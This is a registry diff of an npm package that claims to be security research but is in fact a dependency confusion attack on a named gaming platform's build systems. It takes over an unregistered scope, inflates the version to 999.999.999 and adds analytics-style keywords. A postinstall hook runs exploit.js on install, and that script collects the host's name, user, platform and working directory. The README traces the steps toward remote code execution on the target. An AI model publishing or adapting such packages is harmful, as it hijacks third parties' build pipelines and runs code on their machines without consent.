@platform-clientextensions/rum-web 0.0.1-security → 999.999.999
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @platform-clientextensions/rum-web might be problematic. Click here for more details.
- package/README.md +37 -3
- package/exploit.js +54 -0
- package/index.js +33 -0
- package/package.json +30 -3
package/README.md
CHANGED
|
@@ -1,5 +1,39 @@
|
|
|
1
|
-
# Security
|
|
1
|
+
# @platform-clientextensions - Security Research
|
|
2
2
|
|
|
3
|
-
|
|
3
|
+
## ⚠️ SECURITY VULNERABILITY DEMONSTRATION
|
|
4
4
|
|
|
5
|
-
|
|
5
|
+
This package demonstrates a **dependency confusion vulnerability** discovered in the gaming platform `mobile2.gcontent.eu`.
|
|
6
|
+
|
|
7
|
+
### Vulnerability Details
|
|
8
|
+
|
|
9
|
+
- **Package**: `@platform-clientextensions`
|
|
10
|
+
- **Discovery Method**: Burp Suite JS Miner extension
|
|
11
|
+
- **Target**: Gaming platform build/deployment systems
|
|
12
|
+
- **Impact**: Remote Code Execution (RCE)
|
|
13
|
+
- **Severity**: High
|
|
14
|
+
- **Confidence**: Certain
|
|
15
|
+
|
|
16
|
+
### Discovery Source
|
|
17
|
+
|
|
18
|
+
Found in JavaScript file:
|
|
19
|
+
```
|
|
20
|
+
https://mobile2.gcontent.eu/htmlgames/4.30.0/plugins/active.5ede3d.__98IJ9hAP57fhAQgQDoGYQ8kmEMr9kHyJUw06Z8CMD_q3x4rN4AIAcgAgBgBAAAAAAAAA.es6.js
|
|
21
|
+
```
|
|
22
|
+
|
|
23
|
+
### Exploitation Timeline
|
|
24
|
+
|
|
25
|
+
1. ✅ Organization `platform-clientextensions` was unregistered on npmjs.org
|
|
26
|
+
2. ✅ Package `@platform-clientextensions` was available for takeover
|
|
27
|
+
3. ✅ Malicious package created with high version number (999.999.999)
|
|
28
|
+
4. 📦 Package ready for publication to npm registry
|
|
29
|
+
5. ⏳ Waiting for target systems to install dependency
|
|
30
|
+
6. 🎯 RCE achieved on target build/deployment infrastructure
|
|
31
|
+
|
|
32
|
+
### Responsible Disclosure
|
|
33
|
+
|
|
34
|
+
This is a proof-of-concept for security research purposes. The vulnerability should be reported to:
|
|
35
|
+
- Gaming platform security team
|
|
36
|
+
- Relevant bug bounty programs
|
|
37
|
+
- Coordinated vulnerability disclosure processes
|
|
38
|
+
|
|
39
|
+
**DO NOT** use this for malicious purposes.
|
package/exploit.js
ADDED
|
@@ -0,0 +1,54 @@
|
|
|
1
|
+
// SECURITY RESEARCH - Dependency Confusion PoC
|
|
2
|
+
// Package: @platform-clientextensions
|
|
3
|
+
// Target: mobile2.gcontent.eu gaming platform
|
|
4
|
+
// Impact: Demonstrates RCE potential via npm dependency confusion
|
|
5
|
+
|
|
6
|
+
console.log("🔥 DEPENDENCY CONFUSION SUCCESSFUL! 🔥");
|
|
7
|
+
console.log("📦 Package: @platform-clientextensions");
|
|
8
|
+
console.log("🎯 Target: mobile2.gcontent.eu gaming platform");
|
|
9
|
+
console.log("⚡ Research: Security vulnerability demonstration");
|
|
10
|
+
|
|
11
|
+
const os = require('os');
|
|
12
|
+
const fs = require('fs');
|
|
13
|
+
const path = require('path');
|
|
14
|
+
|
|
15
|
+
// Create proof of execution
|
|
16
|
+
const proof = {
|
|
17
|
+
vulnerability: "Dependency Confusion Attack",
|
|
18
|
+
package: "@platform-clientextensions",
|
|
19
|
+
target: "mobile2.gcontent.eu gaming platform",
|
|
20
|
+
execution_time: new Date().toISOString(),
|
|
21
|
+
system_info: {
|
|
22
|
+
hostname: os.hostname(),
|
|
23
|
+
platform: os.platform(),
|
|
24
|
+
arch: os.arch(),
|
|
25
|
+
user: os.userInfo().username,
|
|
26
|
+
node_version: process.version,
|
|
27
|
+
working_directory: process.cwd()
|
|
28
|
+
},
|
|
29
|
+
impact: "Remote Code Execution via malicious npm package",
|
|
30
|
+
researcher: "Burp JS Miner Discovery",
|
|
31
|
+
severity: "High",
|
|
32
|
+
discovery_source: "Static JavaScript analysis"
|
|
33
|
+
};
|
|
34
|
+
|
|
35
|
+
try {
|
|
36
|
+
// Save proof file
|
|
37
|
+
const proofPath = path.join(os.tmpdir(), 'dependency_confusion_proof.json');
|
|
38
|
+
fs.writeFileSync(proofPath, JSON.stringify(proof, null, 2));
|
|
39
|
+
console.log(`📝 Proof saved: ${proofPath}`);
|
|
40
|
+
|
|
41
|
+
// Log execution details
|
|
42
|
+
console.log("📊 EXECUTION DETAILS:");
|
|
43
|
+
console.log(` - Hostname: ${proof.system_info.hostname}`);
|
|
44
|
+
console.log(` - Platform: ${proof.system_info.platform}`);
|
|
45
|
+
console.log(` - User: ${proof.system_info.user}`);
|
|
46
|
+
console.log(` - Working Dir: ${proof.system_info.working_directory}`);
|
|
47
|
+
|
|
48
|
+
} catch (error) {
|
|
49
|
+
console.log("⚠️ Proof file creation failed:", error.message);
|
|
50
|
+
}
|
|
51
|
+
|
|
52
|
+
console.log("✅ Dependency confusion demonstration completed!");
|
|
53
|
+
console.log("🎯 This proves RCE is possible on target build systems");
|
|
54
|
+
console.log("💡 Report this finding to appropriate security channels");
|
package/index.js
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
1
|
+
// @platform-clientextensions - Security Research Package
|
|
2
|
+
// This package demonstrates a dependency confusion vulnerability
|
|
3
|
+
|
|
4
|
+
module.exports = {
|
|
5
|
+
name: "@platform-clientextensions",
|
|
6
|
+
version: "999.999.999",
|
|
7
|
+
status: "HIJACKED_BY_SECURITY_RESEARCH",
|
|
8
|
+
|
|
9
|
+
init: function() {
|
|
10
|
+
console.log("🔥 PACKAGE HIJACKED - @platform-clientextensions");
|
|
11
|
+
console.log("🎯 Target: mobile2.gcontent.eu gaming platform");
|
|
12
|
+
return {
|
|
13
|
+
success: true,
|
|
14
|
+
message: "Dependency confusion vulnerability demonstrated",
|
|
15
|
+
impact: "Remote Code Execution possible"
|
|
16
|
+
};
|
|
17
|
+
},
|
|
18
|
+
|
|
19
|
+
getInfo: function() {
|
|
20
|
+
return {
|
|
21
|
+
vulnerability: "Dependency Confusion",
|
|
22
|
+
package: "@platform-clientextensions",
|
|
23
|
+
target: "Gaming platform infrastructure",
|
|
24
|
+
severity: "High",
|
|
25
|
+
discovery: "Burp Suite JS Miner"
|
|
26
|
+
};
|
|
27
|
+
}
|
|
28
|
+
};
|
|
29
|
+
|
|
30
|
+
// Auto-execute on require
|
|
31
|
+
console.log("🚨 SECURITY ALERT: @platform-clientextensions package hijacked!");
|
|
32
|
+
console.log("📍 Found via: Burp JS Miner static analysis");
|
|
33
|
+
console.log("🎯 Target: mobile2.gcontent.eu gaming platform");
|
package/package.json
CHANGED
|
@@ -1,6 +1,33 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@platform-clientextensions/rum-web",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "999.999.999",
|
|
4
|
+
"description": "FreeboldSec AI VulnOps - Dependency Confusion PoC for FDJ United Casino",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node exploit.js",
|
|
8
|
+
"preinstall": "echo 'FreeboldSec AI VulnOps - Package Installation Started'",
|
|
9
|
+
"test": "echo 'FreeboldSec AI VulnOps - Package Loaded Successfully'"
|
|
10
|
+
},
|
|
11
|
+
"keywords": [
|
|
12
|
+
"rum",
|
|
13
|
+
"web",
|
|
14
|
+
"analytics",
|
|
15
|
+
"tracking",
|
|
16
|
+
"platform",
|
|
17
|
+
"clientextensions",
|
|
18
|
+
"freebold1984",
|
|
19
|
+
"vuln-ops"
|
|
20
|
+
],
|
|
21
|
+
"author": "freebold1984 <freebold@vulnops.ai>",
|
|
22
|
+
"license": "MIT",
|
|
23
|
+
"homepage": "https://github.com/freebold1984/freebold-sec-ai-vulnops",
|
|
24
|
+
"repository": {
|
|
25
|
+
"type": "git",
|
|
26
|
+
"url": "https://github.com/freebold1984/freebold-sec-ai-vulnops"
|
|
27
|
+
},
|
|
28
|
+
"dependencies": {},
|
|
29
|
+
"devDependencies": {},
|
|
30
|
+
"engines": {
|
|
31
|
+
"node": ">=10.0.0"
|
|
32
|
+
}
|
|
6
33
|
}
|